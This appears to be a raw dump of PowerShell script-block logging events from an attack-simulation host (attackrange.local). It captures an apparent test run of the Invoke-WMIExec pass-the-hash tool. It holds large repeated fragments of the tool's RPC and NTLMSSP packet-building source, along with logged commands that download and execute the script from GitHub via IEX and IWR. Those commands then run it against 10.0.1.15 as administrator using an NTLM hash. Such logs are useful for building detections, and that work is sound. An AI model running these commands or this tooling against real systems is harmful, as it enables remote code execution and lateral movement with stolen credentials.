$packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } 026a36a2-114e-48d4-ac8c-37db2589c325 4104152150x0725952Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}cb01a494-eba1-4b38-96ca-7ceeadb1fe26 4104152150x0725950Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}361ee240-9871-459f-ac14-52442ee0be66 4104152150x0725454Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c774fb679d-0f20-43ae-8bfd-a0701fc32346 4104152150x0725190Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c73ae34685-1692-4c1e-ad33-e6e270bcfb15 4104152150x0724926Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 127.0.0.1 -Username administrator -Domain attackrange.local -Hash ead0cc57ddaae50d876b7dd6386fa9c76743346c-67ed-4304-bd63-2538f1258dfe 4104152150x0724662Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 127.0.0.1 -Username administrator -Domain attackrange -Hash ead0cc57ddaae50d876b7dd6386fa9c7d2494693-c23c-4a68-bb55-bf09f9fa1fea 4104152150x0724631Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11Invoke-WMIExec -Target 127.0.0.1 -Username attackrange.local\administrator3ac0c25c-0ed7-42e7-8193-effc3679bd14 4104132150x0724308Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local19function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContefb446978-65a2-4020-9b74-1ad929bf85d4 4104152150x0724302Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}dbcea1a4-eabe-4e00-87d3-638c9bda886b 4104152150x0724300Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.15 -Username administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}e7cbe28c-d21b-4e62-bee2-9f9d1c241cb0 4104132150x0723800Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local17function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) 